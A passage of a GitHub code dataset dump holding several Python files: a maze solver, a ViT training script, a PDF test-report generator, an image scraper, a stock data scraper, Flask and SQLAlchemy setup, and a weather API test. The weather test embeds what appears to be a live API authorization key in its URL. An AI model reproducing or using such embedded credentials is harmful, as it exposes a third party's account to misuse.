"usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "utils.analysis.knn", "line_number": 183, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 186, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 195, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 204, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser.from_args", "line_number": 212, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser", "line_number": 212, "usage_type": "name"}]}
+{"seq_id": "11764670549", "text": "from Maze import Maze\nfrom datetime import datetime\nfrom queue import heappop, heappush, deque\n\nclass MazeSolverIDDFS():\n startT = datetime.now()\n def __init__(self,maze):\n self.maze = maze\n\n\n def IDDFS(self):\n \n start = self.maze.getCell(0, 0)\n goal = self.maze.getCell(self.maze.size-1, self.maze.size-1)\n prev_iter_visited, depth = [], 0\n while True:\n traced_path, visited = self.DLS(start, goal, depth)\n if traced_path or len(visited) == len(prev_iter_visited): return traced_path\n else: prev_iter_visited = visited; depth += 1\n \n\n def DLS(self, start, goal, limit=-1):\n \n found, fringe, visited, came_from = False, deque([(0, start)]), set([start]), {start: None}\n while not found and len(fringe):\n depth, current = fringe.pop()\n if current == goal: found = True; break\n if limit == -1 or depth < limit:\n for node in current.edges.values():\n if node not in visited:\n visited.add(node); fringe.append((depth + 1, node))\n came_from[node] = current\n if found: print(\"IDDFS total time run \",datetime.now()-self.startT,\" total expanded cells:\",len(visited)+1,\" optimum path lenght: \",self.maze.optimum); return came_from, visited\n else: return None, visited\n", "repo_name": "n6parmak/Maze-Generator-Solver", "sub_path": "MazeSolverIDDFS.py", "file_name": "MazeSolverIDDFS.py", "file_ext": "py", "file_size_in_byte": 1403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "name"}, {"api_name": "queue.deque", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "24410508495", "text": "import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as transforms\nimport os\nimport random\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader\nfrom pytorch_pretrained_vit import ViT\nfrom p1_dataset import p1_data\n\n# Set random seed for reproducibility\nmanualSeed = 0\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\n\nbatch_size = 8\nworkers = 2\nlr = 1e-5\nweight_decay = 1e-5\nnum_epochs = 30\nnum_classes = 37\n\n\nroot = 'hw3_data/p1_data'\nmodel_dir = './p1_models'\nos.makedirs(model_dir, exist_ok=True)\n\ntrain_dir = os.path.join(root, 'train')\nvalid_dir = os.path.join(root, 'val')\n\ntrain_tfm = transforms.Compose([\n transforms.RandomRotation(30), \n transforms.RandomResizedCrop(384, scale=(0.8, 1.0)),\n transforms.ColorJitter(brightness=0.3),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\ntest_tfm = transforms.Compose([\n transforms.Resize((384, 384)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n\ntrain_dataset = p1_data(train_dir, mode='train', transform=train_tfm)\nvalid_dataset = p1_data(valid_dir, mode='valid', transform=test_tfm)\n\n# Create the dataloader\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=workers)\nvalid_loader = DataLoader(valid_dataset, batch_size=batch_size, shuffle=False, num_workers=workers)\n\n# Decide which device we want to run on\ndevice = torch.device(\"cuda\" if (torch.cuda.is_available()) else \"cpu\")\n\nmodel = ViT('B_16_imagenet1k', pretrained=True, num_classes=num_classes)\nmodel = model.to(device)\nprint(model)\n\n# Initialize Loss function\ncriterion = nn.CrossEntropyLoss()\n\noptimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\n\n\n# Training Loop\ntrain_losses = []\n\nfor epoch in range(num_epochs):\n\n # ---------- Training ----------\n # Make sure the model is in train mode before training.\n model.train()\n\n # These are used to record information in training.\n train_loss = []\n train_accs = []\n\n # Iterate the training set by batches.\n for i, batch in enumerate(train_loader):\n \n # A batch consists of image data and corresponding labels.\n imgs, labels = batch\n labels = labels.long().to(device)\n \n # Forward the data. (Make sure data and model are on the same device.)\n logits = model(imgs.to(device))\n \n # Calculate the cross-entropy loss.\n # We don't need to apply softmax before computing cross-entropy as it is done automatically.\n loss = criterion(logits, labels)\n\n # Gradients stored in the parameters in the previous step should be cleared out first.\n optimizer.zero_grad()\n \n # Compute the gradients for parameters.\n loss.backward()\n \n # Update the parameters with computed gradients.\n optimizer.step()\n \n # Compute the accuracy for current batch.\n acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()\n \n # Record the loss and accuracy.\n train_loss.append(loss.item())\n train_accs.append(acc)\n\n # The average loss and accuracy of the training set is the average of the recorded values.\n train_loss = sum(train_loss) / len(train_loss)\n train_acc = sum(train_accs) / len(train_accs)\n train_losses.append(train_loss)\n # Print the information.\n print(f\"[{epoch+1:03d}/{num_epochs:03d}] loss = {train_loss:.5f}, acc = {train_acc:.5f}\")\n torch.save(model.state_dict(), os.path.join(model_dir, 'p1_model.pth'))\n\nplt.figure(figsize=(10,5))\nplt.title(\"Training Loss\")\nplt.plot(train_losses,label=\"train\")\nplt.xlabel(\"iterations\")\nplt.ylabel(\"Loss\")\nplt.legend()\nplt.savefig(\"./p1_Loss.png\")\n\n# Testing\nprint('Testing started!')\nmodel.eval()\ntest_hit = 0\nfor i, batch in enumerate(valid_loader):\n imgs, labels = batch\n with torch.no_grad():\n logits = model(imgs.to(device))\n\n test_hit += (logits.argmax(dim=-1) == labels.to(device)).sum()\n\ntest_acc = test_hit / len(valid_dataset)\nprint(f\"Testing Acc = {test_acc:.4f}\")\n", "repo_name": "yiwei32/NTU_courses", "sub_path": "2021_Fall/DLCV/hw3/p1_train.py", "file_name": "p1_train.py", "file_ext": "py", "file_size_in_byte": 4231, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.seed", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 17, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Compose", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomRotation", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 36, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 39, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 39, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 41, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 41, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 42, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 42, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 43, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 44, "usage_type": "name"}, {"api_name": "p1_dataset.p1_data", "line_number": 47, "usage_type": "call"}, {"api_name": "p1_dataset.p1_data", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pytorch_pretrained_vit.ViT", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 132, "usage_type": "call"}]}
+{"seq_id": "38143746710", "text": "from random import choice, choices, randint\r\nfrom datetime import datetime\r\nfrom json import load\r\nfrom fpdf import FPDF\r\n\r\n\r\ndef print_report_to_pdf(pdf, report):\r\n \"\"\" Function which writes the data from report in pdf file.\"\"\"\r\n table_cell_width = 30\r\n table_cell_height = 5\r\n pdf.set_font('Times', '', 10)\r\n column_names = report[0].keys()\r\n\r\n for column in column_names:\r\n pdf.cell(table_cell_width, table_cell_height, column, align='C', border=1)\r\n pdf.ln(table_cell_height)\r\n pdf.set_font('Times', '', 10)\r\n\r\n for line in report:\r\n for column in column_names:\r\n if line[\"Correct answer\"] != line[\"User choice\"]:\r\n pdf.set_font('Times', 'B', 10)\r\n if column == \"Correct answer\":\r\n pdf.set_text_color(0, 255, 0)\r\n elif column == \"User choice\":\r\n pdf.set_text_color(255, 0, 0)\r\n else:\r\n pdf.set_text_color(0, 0, 0)\r\n else:\r\n pdf.set_font('Times', '', 10)\r\n pdf.set_text_color(0, 0, 0)\r\n value = str(line[column])\r\n if column == 'Letters':\r\n table_cell_height = 5\r\n x = pdf.get_x()\r\n y = pdf.get_y()\r\n pdf.multi_cell(table_cell_width, table_cell_height, value, align='C', border=1)\r\n pdf.set_xy(x + table_cell_width, y)\r\n else:\r\n table_cell_height = 10\r\n pdf.cell(table_cell_width, table_cell_height, value, align='C', border=1)\r\n pdf.ln(table_cell_height)\r\n\r\n\r\nclass PerceptualSpeed:\r\n def __init__(self):\r\n with open('resources/letters.json') as letters_file:\r\n self.letters = load(letters_file)\r\n self.upper_row = []\r\n self.lower_row = []\r\n self.report = []\r\n self.questions = 0\r\n self.answer = 0\r\n self.user_answer = 0\r\n self.score = 0\r\n\r\n def choice_letters(self):\r\n \"\"\" Generate a pair of random letters.\"\"\"\r\n letter = choice(list(self.letters.keys()))\r\n letter_weights = [1 for _ in range(0, len(list(self.letters.keys())))]\r\n for character in self.letters[letter]:\r\n index = list(self.letters.keys()).index(character)\r\n letter_weights[index] += 19\r\n letter_weights[list(self.letters.keys()).index(letter)] += 34\r\n pair_letter = choices(list(self.letters.keys()), weights=letter_weights, k=1)\r\n # print(letter, pair_letter[0])\r\n return [letter, pair_letter[0]]\r\n\r\n def get_letters(self):\r\n \"\"\" Generate 4 pairs of letters. \"\"\"\r\n self.upper_row = []\r\n self.lower_row = []\r\n while len(self.upper_row) < 4:\r\n pair = self.choice_letters()\r\n if pair[0] not in self.upper_row and pair[1] not in self.lower_row:\r\n self.upper_row.append(pair[0])\r\n self.lower_row.append(pair[1])\r\n self.questions += 1\r\n if randint(0, 1) == 0:\r\n self.upper_row = [letter.upper() for letter in self.upper_row]\r\n else:\r\n self.lower_row = [letter.upper() for letter in self.lower_row]\r\n\r\n def find_answer(self):\r\n \"\"\" Find the number of matching letter pairs.\"\"\"\r\n self.answer = 0\r\n for index in range(4):\r\n if self.upper_row[index].lower() == self.lower_row[index].lower():\r\n self.answer += 1\r\n\r\n def check_answer(self, user_choice):\r\n \"\"\" Check if user has guessed the correct answer. It adds the exercise to the report.\"\"\"\r\n self.user_answer = user_choice\r\n self.add_report()\r\n if self.answer == self.user_answer:\r\n return True\r\n return False\r\n\r\n def add_report(self):\r\n \"\"\" Insert the question with the correct answer and the user's choice\r\n inside a report list.\r\n \"\"\"\r\n letters = f\"{self.upper_row[0]} {self.upper_row[1]} {self.upper_row[2]}\" \\\r\n f\" {self.upper_row[3]}\\n{self.lower_row[0]} {self.lower_row[1]}\" \\\r\n f\" {self.lower_row[2]} {self.lower_row[3]}\"\r\n self.report.append({\"Question No\": self.questions, \"Letters\": letters,\r\n \"Correct answer\": self.answer, \"User choice\": self.user_answer})\r\n\r\n def save_report(self):\r\n \"\"\" Saves the report of this test in a .pdf file. \"\"\"\r\n time_now = datetime.now()\r\n time_format = \"%d/%m/%Y %H:%M\"\r\n date_time = time_now.strftime(time_format)\r\n\r\n pdf = FPDF()\r\n pdf.add_page()\r\n pdf.set_font('Times', 'B', 16)\r\n pdf.cell(195, 10, 'PERCEPTUAL SPEED TEST REPORT', 0, 1, 'C')\r\n pdf.cell(195, 10, date_time, 0, 1, 'C')\r\n pdf.cell(195, 10, f\"Score: {self.score}/{self.questions - 1}\", 0, 1, 'C')\r\n pdf.ln(10)\r\n\r\n print_report_to_pdf(pdf, self.report)\r\n\r\n time_format = \"%H-%M_%d-%m-%Y\"\r\n date_time = time_now.strftime(time_format)\r\n pdf.output(f'reports/{date_time}_perceptual_speed_report.pdf', 'F')\r\n self.report.clear()\r\n", "repo_name": "DanielM24/GIA-Practice-Tests", "sub_path": "perceptual_speed.py", "file_name": "perceptual_speed.py", "file_ext": "py", "file_size_in_byte": 5106, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 48, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 59, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 65, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 111, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 111, "usage_type": "name"}, {"api_name": "fpdf.FPDF", "line_number": 115, "usage_type": "call"}]}
+{"seq_id": "29719035240", "text": "\n\n\nimport threading\nimport cv2\nimport numpy as np\n\ndef sub(obj, ROI):\n np.copyto(ROI[:,:,0],obj.apply(ROI, None, -1))\n\nfgbg = cv2.createBackgroundSubtractorKNN(100, 500, False)\n\nthreadcount = 10\nthreads = []\ndata = []\n\nfor x in range(threadcount):\n data.append((255 * np.random.rand(320, 200, 1)).astype(dtype=\"uint8\"))\n threads.append(threading.Thread(target=sub, args=[fgbg, data[x]]))\n\n# Start them all\nfor thread in threads:\n thread.start()\n\n# Wait for all to complete\nfor thread in threads:\n thread.join()\n\nprint()\n\n\n", "repo_name": "janssenda/test-async-py", "sub_path": "complex-process.py", "file_name": "complex-process.py", "file_ext": "py", "file_size_in_byte": 537, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.copyto", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.createBackgroundSubtractorKNN", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "36622721246", "text": "from bs4 import BeautifulSoup\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\nimport os\n\ndef startSearch():\n ##Initialize the search\n search = input('Search for:')\n params = {'q': search}\n ##Replaces spaces with unnderscores for url search\n dir_name = search.replace(' ', '_').lower()\n ##If a directory with the search term doesnt exist, make a directory for it\n if not os.path.isdir(dir_name):\n os.makedirs(dir_name)\n ## Get the url plugging in the provided search term as the parameter\n r = requests.get('http://www.bing.com/images/search', params=params)\n # Intialize the HTML soup\n soup = BeautifulSoup(r.text, 'html.parser')\n ## Parse the soup for all a tags with a class of thumb\n links = soup.findAll('a', {'class': 'thumb'})\n\n for item in links:\n try:\n ## Get the link of each a tag\n img_obj = requests.get(item.attrs['href'])\n print(\"getting\", item.attrs['href'])\n title = item.attrs['href'].split('/')[-1]\n try:\n ## Get the image inside of the a tag\n img = Image.open(BytesIO(img_obj.content))\n ## Save that image in the directory\n img.save('./' + dir_name + '/' + title, img.format)\n except:\n print('could not save image')\n except:\n print(\"could not request Image\")\n startSearch()\n\n## Initialize the search by calling the function\nstartSearch()\n\n", "repo_name": "cirrusm/web-scraper", "sub_path": "images.py", "file_name": "images.py", "file_ext": "py", "file_size_in_byte": 1488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 31, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "35221357611", "text": "import pytest\nimport requests\n\ndef test_weather_correct():\n url = \"https://opendata.cwb.gov.tw/api/v1/rest/datastore/F-D0047-061?Authorization=CWB-E0CBEB14-87B4-49A9-A4CA-A3240E63E9F4\"\n\n # 執行 API 呼叫並取得回應\n response = fetch_weather_data(url)\n\n # 確認回應的狀態碼為 200 (表示成功)\n assert response.status_code == 200\n\n # 確認回應的 JSON 資料中包含了 'records'、'locations' 和 'location' 的項目\n assert 'records' in response.json()\n assert 'locations' in response.json()['records']\n assert 'location' in response.json()['records']['locations'][0]\n\n # 取得文山區的資料\n locations = response.json()['records']['locations'][0]['location']\n wen_location = [x for x in locations if x['locationName'] == '文山區'][0]\n\n # 確認回應的 JSON 資料中包含了 'weatherElement' 的項目\n assert 'weatherElement' in wen_location\n\n # 取得天氣描述的資料\n elementNames = wen_location['weatherElement']\n WeatherDescription_elementName = [x for x in elementNames if x['elementName'] == 'WeatherDescription'][0]\n\n # 確認回應的 JSON 資料中包含了 'time' 的項目\n assert 'time' in WeatherDescription_elementName\n\n # 取得時間描述的資料\n time_descs = WeatherDescription_elementName['time']\n\n # 確認時間描述資料不為空\n assert len(time_descs) > 0\n\ndef fetch_weather_data(url):\n response = requests.get(url)\n return response\n", "repo_name": "yuu0223/FastAPI_Backend", "sub_path": "my-app/tests/test_weather.py", "file_name": "test_weather.py", "file_ext": "py", "file_size_in_byte": 1476, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "4114073938", "text": "import sys\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom flask import Flask\nfrom flask_jsglue import JSGlue\nfrom flask_sqlalchemy_session import flask_scoped_session\n\n\ndef create_app():\n app = Flask(__name__)\n\n db_session = init_db(app)\n\n jsglue = JSGlue()\n jsglue.init_app(app)\n\n from main import bp as main_bp\n app.register_blueprint(main_bp)\n\n return app\n\n\ndef init_db(app):\n from db import Base\n engine = create_engine(url='sqlite:///./db.sqlite', convert_unicode=True, connect_args={})\n session_factory = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\n try:\n Base.metadata.create_all(bind=engine)\n except Exception as e:\n print(\"Cannot create DB, because: \", str(e), file=sys.stderr)\n\n db_session = flask_scoped_session(session_factory, app)\n Base.query = db_session.query_property()\n return db_session\n\n\nif __name__ == '__main__':\n app = create_app()\n app.run(debug=True, host='127.0.0.1', port=2000)\n", "repo_name": "Discyo/Discyo-WebInterface", "sub_path": "web_interface/app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_jsglue.JSGlue", "line_number": 15, "usage_type": "call"}, {"api_name": "main.bp", "line_number": 19, "usage_type": "argument"}, {"api_name": "sqlalchemy.create_engine", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 27, "usage_type": "call"}, {"api_name": "db.Base.metadata.create_all", "line_number": 30, "usage_type": "call"}, {"api_name": "db.Base.metadata", "line_number": 30, "usage_type": "attribute"}, {"api_name": "db.Base", "line_number": 30, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask_sqlalchemy_session.flask_scoped_session", "line_number": 34, "usage_type": "call"}, {"api_name": "db.Base.query", "line_number": 35, "usage_type": "attribute"}, {"api_name": "db.Base", "line_number": 35, "usage_type": "name"}]}
+{"seq_id": "43180279402", "text": "\"\"\"\r\n\r\nBusiness logic:\r\n\r\n1. scrape code from the web by HTTP request \r\n2. For loop with code in pandas to get data \r\n3. Save it in table and send to database (Or excel) ... storing the code status: append code into code \r\n\r\n# for append being pass to pandas and show in tables\r\n\r\n\"\"\"\r\n\r\n# 1. Scraping Teams\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport string\r\nimport re\r\n\r\n\r\n# 2. Accessing Stock data\r\nfrom datetime import datetime, timedelta\r\nimport pandas_datareader.data as web\r\n\r\n# 3. Forming DataFrame\r\nimport pandas as pd\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\n\r\n# Part 1: Getting the US Stock Code \r\n\r\ncodes = [] # store codes\r\nletters = list(string.ascii_uppercase) # Setting A-Z letter list \r\n\r\nprint(\"\\033[1;32;1m Executing Mission 1 ... \\033[0m\\n\") # Green color for signal\r\n\r\nfor letter in letters:\r\n url = f\"https://eoddata.com/stocklist/NASDAQ/{letter}.htm\" # Capital A-Z according to web's pattern\r\n req = requests.get(url)\r\n soup = BeautifulSoup(req.content, 'lxml') # turn into DOM structure\r\n \r\n # filter with special pattern: stockquote/NASDAQ/...\r\n tags = soup.find_all(\"a\", href=re.compile(\"/stockquote/NASDAQ/\")) # regular expression for specified searching \r\n\r\n for t in tags: \r\n if (t.string is not None):\r\n codes.append(t.string)\r\n \r\nprint(\"\\033[1;32;1m Mission 1 Complete ! \\033[0m\\n\") \r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\n# Part 2: Access data from pandas\r\n\r\ncount = 0 # successful searching\r\nerrorCount = 0 # fail searching\r\n\r\nendDate = datetime.now() # Current time system (your computer)\r\nstartDate = endDate - timedelta(days=1) # Two days before current (your computer)\r\n\r\nstr_endDate = endDate.strftime(\"%Y-%m-%d\") # date obj. to string \r\nstr_startDate = startDate.strftime(\"%Y-%m-%d\") \r\nerrorCode = [] # append to list\r\n\r\ncodeStatus = { # Open, close, and volume\r\n \"code\": [],\r\n \"date\": [],\r\n \"codeOpen ($)\": [],\r\n \"codeClose ($)\": [],\r\n \"codeVolume\": []\r\n }\r\n\r\nprint(\"\\033[1;32;1m Executing Mission 2 ... \\033[0m\\n\")\r\n\r\nfor code in codes:\r\n try:\r\n data = web.DataReader(code, \"yahoo\", str_startDate, str_endDate) # Stock_code, search_engine, start_date, end_date\r\n # 要最新果日 (SCRARPE TIME: 香港時間 2022/01/29 01:20 AM, 但用\"2022-01-28\", \"2022-01-29\" 會顯示出27, 28 日的價(可能是時差問題))\r\n \r\n # Attracting the number of rows from the dataset\r\n for i in range(data.shape[0]): # according to its number of row\r\n stockDate = data.index[i].strftime(\"%Y-%m-%d\") # newly added, maybe wrong\r\n stockOpen = data[\"Open\"][i]\r\n stockClose = data[\"Close\"][i]\r\n stockVolume = data[\"Volume\"][i]\r\n \r\n codeStatus[\"code\"].append(code)\r\n codeStatus[\"date\"].append(stockDate)\r\n codeStatus[\"codeOpen ($)\"].append(stockOpen)\r\n codeStatus[\"codeClose ($)\"].append(stockClose)\r\n codeStatus[\"codeVolume\"].append(stockVolume)\r\n \r\n print(f\" Successful: {code}\")\r\n \r\n except:\r\n print(f\"\\033[1;31m Has probelems on -----{code} \\033[0m\") # red color for fail \r\n errorCode.append(code)\r\n \r\n \r\nprint(\"\\033[1;32;1m Mission 2 Complete ! \\033[0m\\n\")\r\n\r\n#----------------------------------------------------------------------------------------------\r\n\r\n# Part 3: Convert Dict to DataFrame and export to CSV file\r\n\r\nprint(\"\\033[1;32;1m Executing Mission 3 ... \\033[0m\\n\")\r\n\r\ndf = pd.DataFrame(codeStatus)\r\ndf.to_csv(f\"stockList_{str_endDate}.csv\", index=False)\r\n# df.to_excel(f\"stockList_{str_endDate}.xlsx\", index=False) // If you want to save as excel\r\n\r\n\r\nprint(f\"Number of stock access: {count}\")\r\nprint(f\"Number of error encounter while scraping: {len(errorCount)}\")\r\nprint(errorCount) \r\n \r\n\r\nprint(\"\\033[1;32;1m Mission 3 Complete ! \\033[0m\\n\")\r\nprint(\"\\033[1;32;1m Finish !!! \\033[0m\\n\")\r\n\r\n# --------------------------------------------------------------------------------------------------\r\n\r\n\"\"\"\r\nCREATE TABLE StockObservation (\r\n id INT PRIMARY KEY AUTO INCREMENT,\r\n Date TIMESTAMP, \r\n OpenPrice DOUBLE,\r\n ClosePrice DOUBLE,\r\n VOLUME INT\r\n)\r\n\r\nSELECT * FROM StockObservation WHERE ....\r\n\"\"\"\r\n", "repo_name": "kcwu229/Investment-Analysis-Program-BetaStock", "sub_path": "Algorithmic Trading Project/Application.py", "file_name": "Application.py", "file_ext": "py", "file_size_in_byte": 4798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "string.ascii_uppercase", "line_number": 33, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas_datareader.data.DataReader", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas_datareader.data", "line_number": 77, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}]}
+{"seq_id": "70010032487", "text": "from uuid import UUID, uuid4\nfrom enum import StrEnum, auto\n\nfrom sqlalchemy import Uuid, ForeignKey\nfrom sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column, relationship\n\nclass Base(DeclarativeBase):\n pass\n\nclass Alcohol(StrEnum):\n VODKA = auto()\n WHISKEY = auto()\n RUM = auto()\n GIN = auto()\n TEQUILA = auto()\n BRANDY = auto()\n LIQUEUR = auto()\n\nclass Drink(Base):\n __tablename__ = \"drinkEntity\"\n\n id: Mapped[Uuid] = mapped_column(primary_key=True, defaul=uuid4)\n base_drink: Mapped[list[Alcohol]] = mapped_column()\n name: Mapped[str] = mapped_column()\n component_ids: Mapped[list[UUID]] = mapped_column(ForeignKey(\"componentEntity.id\"))\n drinks: Mapped[\"Component\"] = relationship(back_populates=\"components\")\n \nclass Component(Base):\n __tablename__ = \"componentEntity\"\n\n id: Mapped[Uuid] = mapped_column(primary_key=True, defaul=uuid4)\n components: Mapped[\"Drink\"] = relationship(back_populates=\"drinks\")\n", "repo_name": "Chrosto9/mixology", "sub_path": "mixology-api/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 973, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.orm.DeclarativeBase", "line_number": 7, "usage_type": "name"}, {"api_name": "enum.StrEnum", "line_number": 10, "usage_type": "name"}, {"api_name": "enum.auto", "line_number": 11, "usage_type": "call"}, {"api_name": "enum.auto", 